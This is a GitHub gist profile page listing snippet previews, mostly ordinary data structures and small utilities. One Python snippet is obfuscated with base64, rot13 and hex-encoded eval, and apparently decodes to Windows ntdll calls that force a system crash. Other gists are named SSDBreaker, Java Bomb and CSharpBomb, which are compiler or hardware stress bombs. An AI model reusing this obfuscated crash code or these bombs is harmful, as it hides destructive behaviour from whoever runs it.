Skip to content

Instantly share code, notes, and snippets.

View QuiltMeow's full-sized avatar
🐈
喵嗚 :3 ~

棉被 QuiltMeow

🐈
喵嗚 :3 ~
View GitHub Profile
# /etc/resolv.conf
# NAT64
# echo -e "nameserver 2a01:4f8:c2c:123f::1" > /etc/resolv.conf
nameserver 2a01:4f8:c2c:123f::1
using System;
using System.Reflection;
namespace Internet_Explorer
{
public static class Program
{
private const BindingFlags MEMBER_ACCESS = BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Static | BindingFlags.Instance | BindingFlags.IgnoreCase;
private const string HOME_PAGE = "https://www.google.com.tw/";
import base64, codecs
magic = "aW1wb3J0IGN0eXBlcy53aW50eXBlcw0KDQpjdHlwZXMud2luZGxsLm50ZGxsLlJ0bEFkan"
love = "ImqSOlnKMcoTIaMFtkBFjtZFjtZPjtL3E5pTImYzW5pzIzXTA0rKOypl5wK2Wio2jbXFxc"
god = "DQpjdHlwZXMud2luZGxsLm50ZGxsLk50UmFpc2VIYXJkRXJyb3IoMHhDMDAwMDAyMiwgMC"
destiny = "jtZPjtZPjtAvjtL3E5pTImYzW5pzIzXTA0rKOypl53nJ50rKOypl5RI09FEPtcXFxAPt=="
joy = "\x72\x6f\x74\x31\x33"
trust = eval("\x6d\x61\x67\x69\x63") + eval("\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29") + eval("\x67\x6f\x64") + eval("\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29")
eval(compile(base64.b64decode(eval("\x74\x72\x75\x73\x74")), "<string>", "exec"))
// Circular Queue
#pragma once
#include <exception>
#include <sstream>
#define DEFAULT_QUEUE_CAPACITY 16
#define NO_ELEMENT -1
#define NO_ELEMENT_MESSAGE "佇列沒有任何元素"
// Funny Stack Queue
#pragma once
#include <stack>
#include <exception>
template <typename T>
class StackQueue {
private:
protected:
using AngleSharp;
using AngleSharp.Dom;
using System;
using System.IO;
using System.Linq;
using System.Net;
using System.Text.RegularExpressions;
using System.Threading;
namespace OldHandheldsDownloader
using System;
using System.Collections.Generic;
using System.IO;
using System.Text;
using System.Threading;
namespace SSDBreaker
{
public static class Program
{
@QuiltMeow
QuiltMeow / Compile.bat
Last active June 29, 2022 17:23
Java Bomb (2 檔案)
@echo off
title Java Bomb
color 3f
javac JavaBomb.java
javac -J-Xmx16G -processor JavaBomb JavaBomb.java
pause
namespace CSharpBomb
{
public class X<A, B, C, D, E>
{
public class Y : X<Y, Y, Y, Y, Y>
{
public Y.Y.Y.Y.Y.Y.Y.Y.Y y;
}
}
#pragma once
#include <string>
class BigInteger {
private:
int sign;
std::string value;
public:
BigInteger() : value("") {